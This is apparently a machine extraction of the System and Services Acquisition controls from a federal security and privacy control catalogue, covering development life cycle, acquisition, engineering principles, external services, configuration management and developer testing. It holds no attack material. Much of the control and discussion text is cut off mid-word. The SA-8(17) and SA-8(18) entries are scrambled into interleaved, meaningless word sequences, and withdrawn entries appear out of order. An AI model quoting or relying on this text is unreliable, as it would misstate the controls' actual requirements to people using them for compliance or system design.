Control Text: a. Determine the high-level information security and privacy requirements for the system or system service in mission and business process planning;
Discussion: Resource allocation for information security and privacy includes funding for system and services acq
Related Controls: PL-7, PM-3, PM-11, SA-9, SR-3, SR-5.

SA-3 System Development Life Cycle
Control Text: a. Acquire, develop, and manage the system using [Assignment: organization-defined system development life cycle] that incorporates information security and privacy considerations;
Discussion: A system development life cycle process provides the foundation for the successful development, implementation, and operation of organizational systems. The integration of security and privacy considerations early in the system development life cycle is a foundational principle of systems security engineering and privacy engineering. To apply the required controls within the system
Related Controls: AT-3, PL-8, PM-7, SA-4, SA-5, SA-8, SA-11, SA-15, SA-17, SA-22, SR-3, SR-4, SR-5, SR-9.

SA-3(1) System Development Life Cycle | Manage Preproduction Environment
Control Text: Protect system preproduction environments commensurate with risk throughout the system developme
Discussion: The preproduction environment includes development, test, and integration environments. The progr
Related Controls: CM-2, CM-4, RA-3, RA-9, SA-4.

SA-3(2) System Development Life Cycle | Use of Live or Operational Data
Control Text: (a) Approve, document, and control the use of live data in preproduction environments for the system, system component, or system service; and
Discussion: Live data is also referred to as operational data. The use of live or operational data in preproduction
Related Controls: PM-25, RA-3.

SA-3(3) System Development Life Cycle | Technology Refresh
Control Text: Plan for and implement a technology refresh schedule for the system throughout the system developm
Discussion: Technology refresh planning may encompass hardware, software, firmware, processes, personnel skill
Related Controls: MA-6.

SA-4 Acquisition Process
Control Text: Include the following requirements, descriptions, and criteria, explicitly or by reference, using [Selection (one or more): standardized contract language; [Assignment: organization-defined contract language]] in the acquisition contract for the system, system component, or system service:
Discussion: Security and privacy functional requirements are typically derived from the high-level security and privacy requirements described in SA-2. The derived requirements include security and privacy capabilities, functions, and mechanisms. Strength requirements associated with such capabilities, functions, and mechanisms include degree of correctness, completeness, resistance to tampering or
Related Controls: CM-6, CM-8, PS-7, SA-3, SA-5, SA-8, SA-11, SA-15, SA-16, SA-17, SA-21, SR-3, SR-5.

SA-4(1) Acquisition Process | Functional Properties of Controls
Control Text: Require the developer of the system, system component, or system service to provide a description of the functional properties of the controls to be implemented.
Discussion: Functional properties of security and privacy controls describe the functionality (i.e., security or privacy capability, functions, or mechanisms) visible at the interfaces of the controls and specifically exclude functionality and data structures internal to the operation of the controls.
Related Controls: None.

SA-4(2) Acquisition Process | Design and Implementation Information for Controls
Control Text: Require the developer of the system, system component, or system service to provide design and implementation information for the controls that includes: [Selection (one or more): security-relevant external system interfaces; high-level design; low-level design; source code or hardware schematics; [Assignment: organization-defined design and implementation information]] at
Discussion: Organizations may require different levels of detail in the documentation for the design and implementation of controls in organizational systems, system components, or system services based on mission and business requirements, requirements for resiliency and trustworthiness, and requirements for analysis and testing. Systems can be partitioned into multiple subsystems. Each
Related Controls: None.

SA-4(3) Acquisition Process | Development Methods, Techniques, and Practices
Control Text: Require the developer of the system, system component, or system service to demonstrate the use of a system development life cycle process that includes:
Discussion: Following a system development life cycle that includes state-of-the-practice software development methods, systems engineering methods, systems security and privacy engineering methods, and quality control processes helps to reduce the number and severity of latent errors within systems, system components, and system services. Reducing the number and severity of such errors reduces
Related Controls: None.

SA-12 Supply Chain Protection [Withdrawn: Incorporated into SR Family.]

SA-4(5) Acquisition Process | System, Component, and Service Configurations
Control Text: Require the developer of the system, system component, or system service to: (a) Deliver the system, component, or service with [Assignment: organization-defined security configurations] implemented; and
Discussion: Examples of security configurations include the U.S. Government Configuration Baseline (USGCB), Security Technical Implementation Guides (STIGs), and any limitations on functions, ports, protocols, and services. Security characteristics can include requiring that default passwords have been changed.
Related Controls: None.

SA-4(6) Acquisition Process | Use of Information Assurance Products
Control Text: (a) Employ only government off-the-shelf or commercial off-the-shelf information assurance and information assurance-enabled information technology products that compose an NSA-approved solution to protect classified information when the networks used to transmit the information are at a lower classification level than the information being transmitted; and
Discussion: Commercial off-the-shelf IA or IA-enabled information technology products used to protect classif
Related Controls: SC-8, SC-12, SC-13.

SA-4(7) Acquisition Process | NIAP-approved Protection Profiles
Control Text: (a) Limit the use of commercially provided information assurance and information assurance-enabled information technology products to those products that have been successfully evaluated against a National Information Assurance Partnership (NIAP)-approved Protection Profile for a specific technology type, if such a profile exists; and
Discussion: See NIAP CCEVS for additional information on NIAP. See NIST CMVP for additional information on FIP
Related Controls: IA-7, SC-12, SC-13.

SA-4(8) Acquisition Process | Continuous Monitoring Plan for Controls
Control Text: Require the developer of the system, system component, or system service to produce a plan for cont
Discussion: The objective of continuous monitoring plans is to determine if the planned, required, and deployed
Related Controls: CA-7.

SA-4(9) Acquisition Process | Functions, Ports, Protocols, and Services in Use
Control Text: Require the developer of the system, system component, or system service to identify the functions, p
Discussion: The identification of functions, ports, protocols, and services early in the system development life cy
Related Controls: CM-7, SA-9.

SA-4(10) Acquisition Process | Use of Approved PIV Products
Control Text: Employ only information technology products on the FIPS 201-approved products list for Personal Iden
Discussion: Products on the FIPS 201-approved products list meet NIST requirements for Personal Identity Verific
Related Controls: IA-2, IA-8, PM-9.

SA-4(11) Acquisition Process | System of Records
Control Text: Include [Assignment: organization-defined Privacy Act requirements] in the acquisition contract for t
Discussion: When, by contract, an organization provides for the operation of a system of records to accomplish an
Related Controls: PT-6.

SA-4(12) Acquisition Process | Data Ownership
Control Text: (a) Include organizational data ownership requirements in the acquisition contract; and (b) Require all data to be removed from the contractor's system and returned to the organization within [Assignment: organization-defined time frame].
Discussion: Contractors who operate a system that contains data owned by an organization initiating the contract have policies and procedures in place to remove the data from their systems and/or return the data in a time frame defined by the contract.
Related Controls: None.

SA-5 System Documentation
Control Text: a. Obtain or develop administrator documentation for the system, system component, or system service that describes:
Discussion: System documentation helps personnel understand the implementation and operation of controls. Organ
Related Controls: CM-4, CM-6, CM-7, CM-8, PL-2, PL-4, PL-8, PS-2, SA-3, SA-4, SA-8, SA-9, SA-10, SA-11, SA-15, SA-16, SA-17, SI-12, SR-3.
SA-12(1) Supply Chain Protection | Acquisition Strategies / Tools / Methods [Withdrawn: Moved to SR-5.]
SA-12(10) Supply Chain Protection | Validate as Genuine and Not Altered [Withdrawn: Moved to SR-4(3).]
SA-12(11) Supply Chain Protection | Penetration Testing / Analysis of Elements, Processes, and Actors [Withdrawn: Moved to SR-6(1).]
SA-12(12) Supply Chain Protection | Inter-organizational Agreements [Withdrawn: Moved to SR-8.]
SA-12(13) Supply Chain Protection | Critical Information System Components [Withdrawn: Incorporated into MA-6 and RA-9.]
SA-12(14) Supply Chain Protection | Identity and Traceability [Withdrawn: Moved to SR-4(1) and SR-4(2).]
SA-12(15) Supply Chain Protection | Processes to Address Weaknesses or Deficiencies [Withdrawn: Incorporated into SR-3.]
SA-8 Security and Privacy Engineering Principles
Control Text: Apply the following systems security and privacy engineering principles in the specification, design
Discussion: Systems security and privacy engineering principles are closely related to and implemented throughout the system development life cycle (see SA-3). Organizations can apply systems security and privacy engineering principles to new systems under development or to systems undergoing upgrades. For existing systems, organizations apply systems security and privacy engineering
Related Controls: PL-8, PM-7, RA-2, RA-3, RA-9, SA-3, SA-4, SA-15, SA-17, SA-20, SC-2, SC-3, SC-32, SC-39, SR-2, SR-3, SR-4, SR-5.

SA-8(1) Security and Privacy Engineering Principles | Clear Abstractions
Control Text: Implement the security design principle of clear abstractions.
Discussion: The principle of clear abstractions states that a system has simple, well-defined interfaces and functions that provide a consistent and intuitive view of the data and how the data is managed. The clarity, simplicity, necessity, and sufficiency of the system interfaces—combined with a precise definition of their functional behavior—promotes ease of analysis, inspection, and testing as well as
Related Controls: None.

SA-8(2) Security and Privacy Engineering Principles | Least Common Mechanism
Control Text: Implement the security design principle of least common mechanism in [Assignment: organization-defined systems or system components].
Discussion: The principle of least common mechanism states that the amount of mechanism common to more than one user and depended on by all users is minimized POPEK74. Mechanism minimization implies that components of a system refrain from using the same mechanism to access a system resource. Every shared mechanism (especially a mechanism involving shared variables)
Related Controls: None.

SA-8(3) Security and Privacy Engineering Principles | Modularity and Layering
Control Text: Implement the security design principles of modularity and layering in [Assignment: organization-d
Discussion: The principles of modularity and layering are fundamental across system engineering disciplines. Modu
Related Controls: SC-2, SC-3.

SA-8(4) Security and Privacy Engineering Principles | Partially Ordered Dependencies
Control Text: Implement the security design principle of partially ordered dependencies in [Assignment: organization-defined systems or system components].
Discussion: The principle of partially ordered dependencies states that the synchronization, calling, and other dependencies in the system are partially ordered. A fundamental concept in system design is layering, whereby the system is organized into well-defined, functionally related modules or components. The layers are linearly ordered with respect to inter-layer dependencies, such that
Related Controls: None.

SA-8(5) Security and Privacy Engineering Principles | Efficiently Mediated Access
Control Text: Implement the security design principle of efficiently mediated access in [Assignment: organization
Discussion: The principle of efficiently mediated access states that policy enforcement mechanisms utilize the l
Related Controls: AC-25.

SA-8(6) Security and Privacy Engineering Principles | Minimized Sharing
Control Text: Implement the security design principle of minimized sharing in [Assignment: organization-defined
Discussion: The principle of minimized sharing states that no computer resource is shared between system compone
Related Controls: SC-31.

SA-8(7) Security and Privacy Engineering Principles | Reduced Complexity
Control Text: Implement the security design principle of reduced complexity in [Assignment: organization-defined systems or system components].
Discussion: The principle of reduced complexity states that the system design is as simple and small as possible. A small and simple design is more understandable, more analyzable, and less prone to error. The reduced complexity principle applies to any aspect of a system, but it has particular importance for security due to the various analyses performed to obtain evidence about the emergent security
Related Controls: None.

SA-8(8) Security and Privacy Engineering Principles | Secure Evolvability
Control Text: Implement the security design principle of secure evolvability in [Assignment: organization-defined
Discussion: The principle of secure evolvability states that a system is developed to facilitate the maintenance
Related Controls: CM-3.

SA-8(9) Security and Privacy Engineering Principles | Trusted Components
Control Text: Implement the security design principle of trusted components in [Assignment: organization-defined systems or system components].
Discussion: The principle of trusted components states that a component is trustworthy to at least a level commensurate with the security dependencies it supports (i.e., how much it is trusted to perform its security functions by other components). This principle enables the composition of components such that trustworthiness is not inadvertently diminished and the trust is not consequently
Related Controls: None.

SA-8(10) Security and Privacy Engineering Principles | Hierarchical Trust
Control Text: Implement the security design principle of hierarchical trust in [Assignment: organization-defined systems or system components].
Discussion: The principle of hierarchical trust for components builds on the principle of trusted components and states that the security dependencies in a system will form a partial ordering if they preserve the principle of trusted components. The partial ordering provides the basis for trustworthiness reasoning or an assurance case (assurance argument) when composing a secure system from
Related Controls: None.

SA-8(11) Security and Privacy Engineering Principles | Inverse Modification Threshold
Control Text: Implement the security design principle of inverse modification threshold in [Assignment: organization-defined systems or system components].
Discussion: The principle of inverse modification threshold builds on the principle of trusted components and the principle of hierarchical trust and states that the degree of protection provided to a component is commensurate with its trustworthiness. As the trust placed in a component increases, the protection against unauthorized modification of the component also increases to the same degree.
Related Controls: None.

SA-8(12) Security and Privacy Engineering Principles | Hierarchical Protection
Control Text: Implement the security design principle of hierarchical protection in [Assignment: organization-defined systems or system components].
Discussion: The principle of hierarchical protection states that a component need not be protected from more trustworthy components. In the degenerate case of the most trusted component, it protects itself from all other components. For example, if an operating system kernel is deemed the most trustworthy component in a system, then it protects itself from all untrusted applications it
Related Controls: None.

SA-8(13) Security and Privacy Engineering Principles | Minimized Security Elements
Control Text: Implement the security design principle of minimized security elements in [Assignment: organization-defined systems or system components].
Discussion: The principle of minimized security elements states that the system does not have extraneous trusted components. The principle of minimized security elements has two aspects: the overall cost of security analysis and the complexity of security analysis. Trusted components are generally costlier to construct and implement, owing to increased rigor of development processes.
Related Controls: None.

SA-8(14) Security and Privacy Engineering Principles | Least Privilege
Control Text: Implement the security design principle of least privilege in [Assignment: organization-defined syst
Discussion: The principle of least privilege states that each system component is allocated sufficient privileges to accomplish its specified functions but no more. Applying the principle of least privilege limits the scope of the component's actions, which has two desirable effects: the security impact of a failure, corruption, or misuse of the component will have a minimized security impact, and the security
Related Controls: AC-6, CM-7.

SA-8(15) Security and Privacy Engineering Principles | Predicate Permission
Control Text: Implement the security design principle of predicate permission in [Assignment: organization-defin
Discussion: The principle of predicate permission states that system designers consider requiring multiple authori
Related Controls: AC-5.

SA-8(16) Security and Privacy Engineering Principles | Self-reliant Trustworthiness
Control Text: Implement the security design principle of self-reliant trustworthiness in [Assignment: organization-defined systems or system components].
Discussion: The principle of self-reliant trustworthiness states that systems minimize their reliance on other systems
Related Controls: None.

SA-8(17) Security and Privacy Engineering Principles | Secure Distributed Composition
Control Text: Implement the security design principle of secure distributed composition in [Assignment:
The for their
principle own trustworthiness.
of secure distributed compositionA systemstates is trustworthy by default, and
that the composition any connection to an None.
of distributed
organization-defined systems external entity is used to supplement its function. If policy
a system were required to maintain a that
SA-8(18) Security and Privacy Engineering Principles | Trusted Communications Channels Implement the security designor system of
principle components].
trusted communications channels in [Assignment: organi components
The principlewith
connection
that enforce the same
of trusted communication system security
channels states result
that when in a system that
composing a system enforces where there isSC-8, SC-12, SC-13.
policy at least as another
well as theexternal entity
individual in order to
components maintain
do. Manyits of trustworthiness,
the design principles thenfor that system
secure
systems deal with how components can or should interact. The need to create or enable a
SA-8(19) Security and Privacy Engineering Principles | Continuous Protection
Control Text: Implement the security design principle of continuous protection in [Assignment: organization-defi
Discussion: The principle of continuous protection states that components and data used to enforce the security policy have uninterrupted protection that is consistent with the security policy and the security architecture assumptions. No assurances that the system can provide the confidentiality, integrity, availability, and privacy protections for its design capability can be made if there are gaps
Related Controls: AC-25.

SA-8(20) Security and Privacy Engineering Principles | Secure Metadata Management
Control Text: Implement the security design principle of secure metadata management in [Assignment: organization-defined systems or system components].
Discussion: The principle of secure metadata management states that metadata are first class objects with respect to security policy when the policy requires either complete protection of information or that the security subsystem be self-protecting. The principle of secure metadata management is driven by the recognition that a system, subsystem, or component cannot achieve self-protection
Related Controls: None.

SA-8(21) Security and Privacy Engineering Principles | Self-analysis
Control Text: Implement the security design principle of self-analysis in [Assignment: organization-defined system
Discussion: The principle of self-analysis states that a system component is able to assess its internal state and
Related Controls: CA-7.

SA-8(22) Security and Privacy Engineering Principles | Accountability and Traceability
Control Text: Implement the security design principle of accountability and traceability in [Assignment: organizat
Discussion: The principle of accountability and traceability states that it is possible to trace security-relevant a
Related Controls: AC-6, AU-2, AU-3, AU-6, AU-9, AU-10, AU-12, IA-2, IR-4.

SA-8(23) Security and Privacy Engineering Principles | Secure Defaults
Control Text: Implement the security design principle of secure defaults in [Assignment: organization-defined sys
Discussion: The principle of secure defaults states that the default configuration of a system (including its constituent subsystems, components, and mechanisms) reflects a restrictive and conservative enforcement of security policy. The principle of secure defaults applies to the initial (i.e., default) configuration of a system as well as to the security engineering and design of access control and
Related Controls: CM-2, CM-6, SA-4.

SA-8(24) Security and Privacy Engineering Principles | Secure Failure and Recovery
Control Text: Implement the security design principle of secure failure and recovery in [Assignment: organization
Discussion: The principle of secure failure and recovery states that neither a failure in a system function or mechanism nor any recovery action in response to failure leads to a violation of security policy. The principle of secure failure and recovery parallels the principle of continuous protection to ensure that a system is capable of detecting (within limits) actual and impending failure at any stage of its
Related Controls: CP-10, CP-12, SC-7, SC-8, SC-24, SI-13.

SA-8(25) Security and Privacy Engineering Principles | Economic Security
Control Text: Implement the security design principle of economic security in [Assignment: organization-defined
Discussion: The principle of economic security states that security mechanisms are not costlier than the potentia
Related Controls: RA-3.

SA-8(26) Security and Privacy Engineering Principles | Performance Security
Control Text: Implement the security design principle of performance security in [Assignment: organization-defin
Discussion: The principle of performance security states that security mechanisms are constructed so that they do not degrade system performance unnecessarily. Stakeholder and system design requirements for performance and security are precisely articulated and prioritized. For the system implementation to meet its design requirements and be found acceptable to stakeholders (i.e., the
Related Controls: SC-12, SC-13, SI-2, SI-7.

SA-8(27) Security and Privacy Engineering Principles | Human Factored Security
Control Text: Implement the security design principle of human factored security in [Assignment: organization-defined systems or system components].
Discussion: The principle of human factored security states that the user interface for security functions and supporting services is intuitive, user-friendly, and provides feedback for user actions that affect such policy and its enforcement. The mechanisms that enforce security policy are not intrusive to the system user and are designed not to degrade user efficiency. Security policy enforcement mechanisms also
Related Controls: None.

SA-8(28) Security and Privacy Engineering Principles | Acceptable Security
Control Text: Implement the security design principle of acceptable security in [Assignment: organization-defined systems or system components].
Discussion: The principle of acceptable security requires that the level of privacy and performance that the system provides is consistent with the users’ expectations. The perception of personal privacy may affect user behavior, morale, and effectiveness. Based on the organizational privacy policy and the system design, users should be able to restrict their actions to protect their privacy. When systems
Related Controls: None.

SA-8(29) Security and Privacy Engineering Principles | Repeatable and Documented Procedures
Control Text: Implement the security design principle of repeatable and documented procedures in [Assignment:
Discussion: The principle of repeatable and documented procedures states that the techniques and methods emplo
Related Controls: CM-1, SA-1, SA-10, SA-11, SA-15, SA-17, SC-1, SI-1.

SA-8(30) Security and Privacy Engineering Principles | Procedural Rigor
Control Text: Implement the security design principle of procedural rigor in [Assignment: organization-defined systems or system components].
Discussion: The principle of procedural rigor states that the rigor of a system life cycle process is commensurate with its intended trustworthiness. Procedural rigor defines the scope, depth, and detail of the system life cycle procedures. Rigorous system life cycle procedures contribute to the assurance that the system is correct and free of unintended functionality in several ways. First, the procedures
Related Controls: None.

SA-8(31) Security and Privacy Engineering Principles | Secure System Modification
Control Text: Implement the security design principle of secure system modification in [Assignment: organization
Discussion: The principle of secure system modification states that system modification maintains system security
Related Controls: CM-3, CM-4.

SA-8(32) Security and Privacy Engineering Principles | Sufficient Documentation
Control Text: Implement the security design principle of sufficient documentation in [Assignment: organization-d
Discussion: The principle of sufficient documentation states that organizational personnel with responsibilities
Related Controls: AT-2, AT-3, SA-5.

SA-8(33) Security and Privacy Engineering Principles | Minimization
Control Text: Implement the privacy principle of minimization using [Assignment: organization-defined processes].
Discussion: The principle of minimization states that organizations should only process personally identifiable in
Related Controls: PE-8, PM-25, SC-42, SI-12.
SA-9 External System Services
Control Text: a. Require that providers of external system services comply with organizational security and privacy requirements and employ the following controls: [Assignment: organization-defined controls];
Discussion: External system services are provided by an external provider, and the organization has no direct con
Related Controls: AC-20, CA-3, CP-2, IR-4, IR-7, PL-10, PL-11, PS-7, SA-2, SA-4, SR-3, SR-5.

SA-9(1) External System Services | Risk Assessments and Organizational Approvals
Control Text: (a) Conduct an organizational assessment of risk prior to the acquisition or outsourcing of information security services; and
Discussion: Information security services include the operation of security devices, such as firewalls or key manag
Related Controls: CA-6, RA-3, RA-8.

SA-9(2) External System Services | Identification of Functions, Ports, Protocols, and Services
Control Text: Require providers of the following external system services to identify the functions, ports, protocols
Discussion: Information from external service providers regarding the specific functions, ports, protocols, and ser
Related Controls: CM-6, CM-7.

SA-9(3) External System Services | Establish and Maintain Trust Relationship with Providers
Control Text: Establish, document, and maintain trust relationships with external service providers based on the fol
Discussion: Trust relationships between organizations and external service providers reflect the degree of confide
Related Controls: SR-2.

SA-9(4) External System Services | Consistent Interests of Consumers and Providers
Control Text: Take the following actions to verify that the interests of [Assignment: organization-defined external service providers] are consistent with and reflect organizational interests: [Assignment: organization-defined actions].
Discussion: As organizations increasingly use external service providers, it is possible that the interests of the service providers may diverge from organizational interests. In such situations, simply having the required technical, management, or operational controls in place may not be sufficient if the providers that implement and manage those controls are not operating in a manner consistent with orga
Related Controls: None.

SA-9(5) External System Services | Processing, Storage, and Service Location
Control Text: Restrict the location of [Selection (one or more): information processing; information or data; syst
Discussion: The location of information processing, information and data storage, or system services can have a dir
Related Controls: SA-5, SR-4.

SA-9(6) External System Services | Organization-controlled Cryptographic Keys
Control Text: Maintain exclusive control of cryptographic keys for encrypted material stored or transmitted throug
Discussion: Maintaining exclusive control of cryptographic keys in an external system prevents decryption of
Related Controls: SC-12, SC-13, SI-4.

SA-9(7) External System Services | Organization-controlled Integrity Checking
Control Text: Provide the capability to check the integrity of information while it resides in the external system.
Discussion: Storage of organizational information in an external system could limit visibility into the security status
Related Controls: SI-7.

SA-9(8) External System Services | Processing and Storage Location — U.S. Jurisdiction
Control Text: Restrict the geographic location of information processing and data storage to facilities located within
Discussion: The geographic location of information processing and data storage can have a direct impact on the ab
Related Controls: SA-5, SR-4.
SA-10 Developer Configuration Management
Control Text: Require the developer of the system, system component, or system service to: a. Perform configuration management during system, component, or service [Selection (one or more): design; development; implementation; operation; disposal];
Discussion: Organizations consider the quality and completeness of configuration management activities conducted by developers as direct evidence of applying effective security controls. Controls include protecting the master copies of material used to generate security-relevant portions of the system hardware, software, and firmware from unauthorized modification or destruction. Maintaining the
Related Controls: CM-2, CM-3, CM-4, CM-7, CM-9, SA-4, SA-5, SA-8, SA-15, SI-2, SR-3, SR-4, SR-5, SR-6.

SA-10(1) Developer Configuration Management | Software and Firmware Integrity Verification
Control Text: Require the developer of the system, system component, or system service to enable integrity verif
Discussion: Software and firmware integrity verification allows organizations to detect unauthorized changes
Related Controls: SI-7, SR-11.

SA-10(2) Developer Configuration Management | Alternative Configuration Management Processes
Control Text: Provide an alternate configuration management process using organizational personnel in the absence of a dedicated developer configuration management team.
Discussion: Alternate configuration management processes may be required when organizations use commercial off-the-shelf information technology products. Alternate configuration management processes include organizational personnel who review and approve proposed changes to systems, system components, and system services and conduct security and privacy impact analyses prior to
Related Controls: None.

SA-10(3) Developer Configuration Management | Hardware Integrity Verification
Control Text: Require the developer of the system, system component, or system service to enable integrity verif
Discussion: Hardware integrity verification allows organizations to detect unauthorized changes to hardware c
Related Controls: SI-7.

SA-10(4) Developer Configuration Management | Trusted Generation
Control Text: Require the developer of the system, system component, or system service to employ tools for comparing newly generated versions of security-relevant hardware descriptions, source code, and object code with previous versions.
Discussion: The trusted generation of descriptions, source code, and object code addresses authorized changes to hardware, software, and firmware components between versions during development. The focus is on the efficacy of the configuration management process by the developer to ensure that newly generated versions of security-relevant hardware descriptions, source code, and object code
Related Controls: None.

SA-10(5) Developer Configuration Management | Mapping Integrity for Version Control
Control Text: Require the developer of the system, system component, or system service to maintain the integrity of the mapping between the master build data describing the current version of security-relevant hardware, software, and firmware and the on-site master copy of the data for the current version.
Discussion: Mapping integrity for version control addresses changes to hardware, software, and firmware components during both initial development and system development life cycle updates. Maintaining the integrity between the master copies of security-relevant hardware, software, and firmware (including designs, hardware drawings, source code) and the equivalent data in master
Related Controls: None.

SA-10(6) Developer Configuration Management | Trusted Distribution
Control Text: Require the developer of the system, system component, or system service to execute procedures for ensuring that security-relevant hardware, software, and firmware updates distributed to the organization are exactly as specified by the master copies.
Discussion: The trusted distribution of security-relevant hardware, software, and firmware updates help to ensure that the updates are correct representations of the master copies maintained by the developer and have not been tampered with during distribution.
Related Controls: None.

SA-10(7) Developer Configuration Management | Security and Privacy Representatives
Control Text: Require [Assignment: organization-defined security and privacy representatives] to be included in the [Assignment: organization-defined configuration change management and control process].
Discussion: Information security and privacy representatives can include system security officers, senior agency information security officers, senior agency officials for privacy, and system privacy officers. Representation by personnel with information security and privacy expertise is important because changes to system configurations can have unintended side effects, some of which may be security-
Related Controls: None.
SA-11 Developer Testing and Evaluation
Control Text: Require the developer of the system, system component, or system service, at all post-design stages of the system development life cycle, to:
Discussion: Developmental testing and evaluation confirms that the required controls are implemented correctly, operating as intended, enforcing the desired security and privacy policies, and meeting established security and privacy requirements. Security properties of systems and the privacy of individuals may be affected by the interconnection of system components or changes to those
Related Controls: CA-2, CA-7, CM-4, SA-3, SA-4, SA-5, SA-8, SA-15, SA-17, SI-2, SR-5, SR-6, SR-7.

SA-11(1) Developer Testing and Evaluation | Static Code Analysis
Control Text: Require the developer of the system, system component, or system service to employ static code analysis tools to identify common flaws and document the results of the analysis.
Discussion: Static code analysis provides a technology and methodology for security reviews and includes checking for weaknesses in the code as well as for the incorporation of libraries or other included code with known vulnerabilities or that are out-of-date and not supported. Static code analysis can be used to identify vulnerabilities and enforce secure coding practices. It is most effective when
Related Controls: None.

SA-11(2) Developer Testing and Evaluation | Threat Modeling and Vulnerability Analyses
Control Text: Require the developer of the system, system component, or system service to perform threat modeling and vulnerability analyses during development and the subsequent testing and evaluation of the system, component, or service that:
Discussion: Systems, system components, and system services may deviate significantly from the functional and d
Related Controls: PM-15, RA-3, RA-5.

SA-11(3) Developer Testing and Evaluation | Independent Verification of Assessment Plans and Evidence
Control Text: (a) Require an independent agent satisfying [Assignment: organization-defined independence criteria] to verify the correct implementation of the developer security and privacy assessment plans and the evidence produced during testing and evaluation; and
Discussion: Independent agents have the qualifications—including the expertise, skills, training, certifications,
Related Controls: AT-3, RA-5.

SA-11(4) Developer Testing and Evaluation | Manual Code Reviews
Control Text: Require the developer of the system, system component, or system service to perform a manual code review of [Assignment: organization-defined specific code] using the following processes, procedures, and/or techniques: [Assignment: organization-defined processes, procedures, and/or techniques].
Discussion: Manual code reviews are usually reserved for the critical software and firmware components of systems. Manual code reviews are effective at identifying weaknesses that require knowledge of the application’s requirements or context that, in most cases, is unavailable to automated analytic tools and techniques, such as static and dynamic analysis. The benefits of manual code review
Related Controls: None.

SA-11(5) Developer Testing and Evaluation | Penetration Testing
Control Text: Require the developer of the system, system component, or system service to perform penetration testing:
Discussion: Penetration testing is an assessment methodology in which assessors, using all available information
Related Controls: CA-8, PM-14, PM-25, PT-2, SA-3, SI-2, SI-6.

SA-11(6) Developer Testing and Evaluation | Attack Surface Reviews
Control Text: Require the developer of the system, system component, or system service to perform attack surface
Discussion: Attack surfaces of systems and system components are exposed areas that make those systems more vul
Related Controls: SA-15.

SA-11(7) Developer Testing and Evaluation | Verify Scope of Testing and Evaluation
Control Text: Require the developer of the system, system component, or system service to verify that the scope of
Discussion: Verifying that testing and evaluation provides complete coverage of required controls can be accompl
Related Controls: SA-15.

SA-11(8) Developer Testing and Evaluation | Dynamic Code Analysis
Control Text: Require the developer of the system, system component, or system service to employ dynamic code analysis tools to identify common flaws and document the results of the analysis.
Discussion: Dynamic code analysis provides runtime verification of software programs using tools capable of monitoring programs for memory corruption, user privilege issues, and other potential security problems. Dynamic code analysis employs runtime tools to ensure that security functionality performs in the way it was designed. A type of dynamic analysis, known as fuzz testing, induces
Related Controls: None.

SA-11(9) Developer Testing and Evaluation | Interactive Application Security Testing
Control Text: Require the developer of the system, system component, or system service to employ interactive application security testing tools to identify flaws and document the results.
Discussion: Interactive (also known as instrumentation-based) application security testing is a method of detecting vulnerabilities by observing applications as they run during testing. The use of instrumentation relies on direct measurements of the actual running applications and uses access to the code, user interaction, libraries, frameworks, backend connections, and configurations to
Related Controls: None.

SA-12(2) Supply Chain Protection | Supplier Reviews [Withdrawn: Moved to SR-6.]
SA-12(3) Supply Chain Protection | Trusted Shipping and Warehousing [Withdrawn: Incorporated into SR-3.]
SA-12(4) Supply Chain Protection | Diversity of Suppliers [Withdrawn: Moved to SR-3(1).]
SA-12(5) Supply Chain Protection | Limitation of Harm [Withdrawn: Moved to SR-3(2).]
SA-12(6) Supply Chain Protection | Minimizing Procurement Time [Withdrawn: Incorporated into SR-5(1).]
SA-12(7) Supply Chain Protection | Assessments Prior to Selection / Acceptance / Update [Withdrawn: Moved to SR-5(2).]
SA-12(8) Supply Chain Protection | Use of All-source Intelligence [Withdrawn: Incorporated into RA-3(2).]
SA-12(9) Supply Chain Protection | Operations Security [Withdrawn: Moved to SR-7.]
SA-13 Trustworthiness [Withdrawn: Incorporated into SA-8.]
SA-14 Criticality Analysis [Withdrawn: Incorporated into RA-9.]
SA-14(1) Criticality Analysis | Critical Components with No Viable Alternative Sourcing [Withdrawn: Incorporated into SA-20.]
SA-15(4) Development Process, Standards, and Tools | Threat Modeling and Vulnerability Analysis [Withdrawn: Incorporated into SA-11(2).]
SA-15(9) Development Process, Standards, and Tools | Use of Live Data [Withdrawn: Incorporated into SA-3(2).]
SA-18 Tamper Resistance and Detection [Withdrawn: Moved to SR-9.]
SA-18(1) Tamper Resistance and Detection | Multiple Phases of System Development Life Cycle [Withdrawn: Moved to SR-9(1).]
SA-18(2) Tamper Resistance and Detection | Inspection of Systems or Components [Withdrawn: Moved to SR-10.]
SA-19 Component Authenticity [Withdrawn: Moved to SR-11.]
SA-19(1) Component Authenticity | Anti-counterfeit Training [Withdrawn: Moved to SR-11(1).]
SA-19(2) Component Authenticity | Configuration Control for Component Service and Repair [Withdrawn: Moved to SR-11(2).]
SA-15 Development Process, Standards, and Tools
Control Text: a. Require the developer of the system, system component, or system service to follow a documented development process that:
Discussion: Development tools include programming languages and computer-aided design systems. Reviews of devel
Related Controls: MA-6, SA-3, SA-4, SA-8, SA-10, SA-11, SR-3, SR-4, SR-5, SR-6, SR-9.

SA-15(1) Development Process, Standards, and Tools | Quality Metrics
Control Text: Require the developer of the system, system component, or system service to: (a) Define quality metrics at the beginning of the development process; and
Discussion: Organizations use quality metrics to establish acceptable levels of system quality. Metrics can include quality gates, which are collections of completion criteria or sufficiency standards that represent the satisfactory execution of specific phases of the system development project. For example, a quality gate may require the elimination of all compiler warnings or a determination
Related Controls: None.

SA-15(2) Development Process, Standards, and Tools | Security and Privacy Tracking Tools
Control Text: Require the developer of the system, system component, or system service to select and employ secur
Discussion: System development teams select and deploy security and privacy tracking tools, including vulnerabili
Related Controls: SA-11.

SA-15(3) Development Process, Standards, and Tools | Criticality Analysis
Control Text: Require the developer of the system, system component, or system service to perform a criticality analysis:
Discussion: Criticality analysis performed by the developer provides input to the criticality analysis performed b
Related Controls: RA-9.

SA-19(3) Component Authenticity | Component Disposal [Withdrawn: Moved to SR-12.]

SA-15(5) Development Process, Standards, and Tools | Attack Surface Reduction
Control Text: Require the developer of the system, system component, or system service to reduce attack surfaces
Discussion: Attack surface reduction is closely aligned with threat and vulnerability analyses and system architec
Related Controls: AC-6, CM-7, RA-3, SA-11.

SA-15(6) Development Process, Standards, and Tools | Continuous Improvement
Control Text: Require the developer of the system, system component, or system service to implement an explicit process to continuously improve the development process.
Discussion: Developers of systems, system components, and system services consider the effectiveness and efficiency of their development processes for meeting quality objectives and addressing the security and privacy capabilities in current threat environments.
Related Controls: None.

SA-15(7) Development Process, Standards, and Tools | Automated Vulnerability Analysis
Control Text: Require the developer of the system, system component, or system service [Assignment: organization-defined frequency] to:
